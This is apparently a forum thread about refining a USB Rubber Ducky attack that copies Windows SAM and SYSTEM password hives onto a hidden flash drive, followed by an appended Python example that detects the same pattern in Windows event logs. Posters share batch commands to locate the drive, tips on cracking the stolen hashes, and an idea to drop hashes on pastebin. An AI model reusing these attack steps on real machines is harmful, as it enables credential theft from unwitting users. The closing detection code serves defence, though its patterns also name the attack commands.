overwraith Posted October 30, 2012 (edited)
If you add a removable flash drive and USB hub to the Ducky SAM attack (take 'em with you in your pocket and use the hub to plug in simultaneously) and add the file evac.txt to the flash drive's root, you can replace the CD <Directory> command in the SAM payload with this command, which will auto-magically send the SAM file to the flash drive. If we ever get the mass storage firmware we won't even need the hub and flash drive. I am still testing this, so an additional delay may need to be added after this command.

STRING for %a in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) do (IF EXIST %a:\evac.txt cd %a:\ )

Edited February 6, 2013 by midnitesnake: Corrected Formatting
overwraith Posted October 31, 2012 (Author, edited)
I spoke a little too soon. Don't use CD for change directory as I did in the first post; use the following:

for %a in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) do (IF EXIST %a:\evac.txt %a: )

Edited February 6, 2013 by midnitesnake: Corrected Formatting
overwraith Posted October 31, 2012 (Author)
Looks like all the bugs were worked out with that last command. Anyone have some batch magic for renaming the SAM like the following: SAM --> SAM1 --> SAM2 --> SAM3 --> SAM4, so we can store multiple users' SAMs without losing the ones we have already collected? Also, does anyone have a program for brute forcing the password out of these SAMs?
Xcellerator Posted November 6, 2012 (edited)
Nice! There's been loads of great improvements on my original payload. The only thing that immediately comes to mind is creating folders for each SAM file (or just file names) based on %computername%.

for %a in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) do (IF EXIST %a:\%computername%.txt %a: )

And there's a free program called SamInside which can brute force SAM and SYSTEM files. It's not that fast, so it might be better to export the NTLM hashes into Cain or a GPU cracker if you're one of those lucky people...

Edited February 6, 2013 by midnitesnake: Corrected Formatting
Aprizm Posted November 7, 2012
Instead of creating a file you should append whatever you found to your .txt file. That way you will never lose the one you got before. Have a file called Samdump.txt and just do this:

samfile >> Samdump.txt
overwraith Posted November 8, 2012 (Author)
I'm glad people think this is cool. I will look into using SamInside, or the export to NTLM hashes then Cain or a GPU cracker. As far as the methods of recording more than one SAM, I will look into both methods, the %computername% and accumulating in a text file. I am a little worried with the accumulation into a text file that programs will have trouble reading the back-to-back encrypted data, but if all SAM files are the same size then it shouldn't be a problem, as we can always parse the data via command filters/flags, or separate it into other files later. Good points from everybody.
Aprizm Posted November 18, 2012
I dunno if this has been mentioned before, but maybe pastebin could be used to drop the data once it's been fetched.
1 - get the hash
2 - open browser in pastebin -> login pastebin -> paste the hash -> logout -> close browser
3 - tada
Didn't try it but I'm pretty sure it's doable. The reason why you wanna log in to pastebin is so that you can easily access your paste once you go back home.
Xcellerator Posted December 11, 2012
If you take a look at a project called Nishang, which is a pen testing framework using PowerShell, I'm sure there was a payload that uses a pastebin account and the API to upload stolen information. Perhaps you could look into that. The same guy who wrote Nishang also wrote Kautilya, which is a great HID pentesting framework for the Teensy boards; porting it to the Ducky would be an interesting project...
mrt0mat0 Posted January 20, 2013 (edited)
In case anyone is curious, I have my setup so that it uses both the evac.txt check and, prior to running scripts, it creates a folder using the computer name, which works great for multiple attacks without overwriting (unless people have the same computer name). In theory you could loop through similarly to the drive name to check for a file and append a number, increasing until it has a free space, but meh. I'm currently using the Twin Duck and it works great for storing. Then I just plug my SD into my Linux system and use samdump.

I'm having two weird issues and I'm not sure if they're related. First, the create part of vssown is failing due to an error, which I don't get the opportunity to copy and paste. Next time I'll tweak it so it stops there and I can get the error, or just remove the exit, as it's not necessary while I'm testing. The second part is that the SYSTEM file takes 5 minutes + to download to the flash drive. I'm not sure if this relates to the vssown or if it's because I'm copying back to a USB that's also handling the commands, or if it's the size, which is only 28 MB. It still works, but I'd prefer a *snap* done result.

Edited January 20, 2013 by smacks
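Seen from the blue-team side, the sequence this thread has converged on (a USB device appearing, a shadow copy being created a few seconds later, and the SAM/SYSTEM hives being read out of it) is a fairly specific pattern in the Windows Security log. The following is an added example, not code from this thread or from any of the posters; it runs a small correlation over constructed log events (the hosts, timestamps and command lines are made up for the example, and the field names ClassName and CommandLine are assumed to mirror the EventData of events 6416 and 4688).

```python
"""Defender-side correlation for the pattern discussed in this thread:
a new external device (event 6416) on a host, followed within a short
window by process creation (event 4688) that creates a shadow copy or
reads registry hives out of one.

Example code only; the sample events below are constructed, not real
captures, and the EventData field names are an assumption."""
from dataclasses import dataclass
from datetime import datetime, timedelta
import re


@dataclass
class Event:
    ts: datetime
    host: str
    event_id: int   # Windows Security log event ID
    data: dict      # selected EventData fields


# Command-line patterns covering the shadow-copy tools this thread mentions
# (vssown.vbs) plus the built-in ways of doing the same thing.
SHADOW_RE = re.compile(
    r"vssadmin\s+create\s+shadow|shadowcopy\s+create|vssown\.vbs\s+/create",
    re.I)
# Direct reads of the hive files, or of anything under a shadow-copy device path.
HIVE_RE = re.compile(
    r"\\config\\(SAM|SYSTEM|SECURITY)(\b|$)|HarddiskVolumeShadowCopy\d+",
    re.I)

# Constructed sample: WS01 sees a keyboard and a mass-storage device arrive,
# then a shadow copy and a hive copy within 30 seconds. WS02 creates a shadow
# copy with no device arrival (e.g. a scheduled backup) and rates lower.
SAMPLE_EVENTS = [
    Event(datetime(2013, 1, 20, 2, 0, 0), "WS02", 4688,
          {"CommandLine": "vssadmin create shadow /for=C:"}),
    Event(datetime(2013, 1, 20, 10, 0, 0), "WS01", 6416,
          {"ClassName": "HIDClass", "DeviceDescription": "USB Input Device"}),
    Event(datetime(2013, 1, 20, 10, 0, 1), "WS01", 6416,
          {"ClassName": "DiskDrive", "DeviceDescription": "USB Mass Storage Device"}),
    Event(datetime(2013, 1, 20, 10, 0, 8), "WS01", 4688,
          {"CommandLine": "cmd.exe /c cscript //nologo vssown.vbs /create C"}),
    Event(datetime(2013, 1, 20, 10, 0, 30), "WS01", 4688,
          {"CommandLine": r"copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1"
                          r"\Windows\System32\config\SAM E:\WS01\SAM"}),
    Event(datetime(2013, 1, 20, 10, 1, 0), "WS01", 4688,
          {"CommandLine": "notepad.exe"}),   # benign noise, must not alert
]


def classify(ev):
    """Tag a 4688 event as shadow-copy creation or hive access, else None."""
    if ev.event_id != 4688:
        return None
    cmd = ev.data.get("CommandLine", "")
    if SHADOW_RE.search(cmd):
        return "shadow_copy_create"
    if HIVE_RE.search(cmd):
        return "hive_access"
    return None


def recent_usb_arrivals(events, host, before, window):
    """6416 events on the same host in the window ending at `before`."""
    return [e for e in events
            if e.event_id == 6416 and e.host == host
            and before - window <= e.ts <= before]


def detect(events, window=timedelta(minutes=10)):
    """Return one alert per suspicious 4688, rated high when a USB device
    arrived on that host shortly beforehand and medium otherwise."""
    events = sorted(events, key=lambda e: e.ts)
    alerts = []
    for ev in events:
        tag = classify(ev)
        if tag is None:
            continue
        usb = recent_usb_arrivals(events, ev.host, ev.ts, window)
        alerts.append({
            "host": ev.host,
            "ts": ev.ts.isoformat(),
            "tag": tag,
            "severity": "high" if usb else "medium",
            "usb_classes": sorted({e.data.get("ClassName", "?") for e in usb}),
            "command": ev.data.get("CommandLine", ""),
        })
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

Two audit settings decide whether these events exist at all: event 6416 needs "Audit PnP Activity" (Advanced Audit Policy, Detailed Tracking) turned on, and 4688 only carries a CommandLine field when "Include command line in process creation events" is enabled. Without the second one the HIVE_RE and SHADOW_RE matches have nothing to look at, so check that first when testing this on a real host.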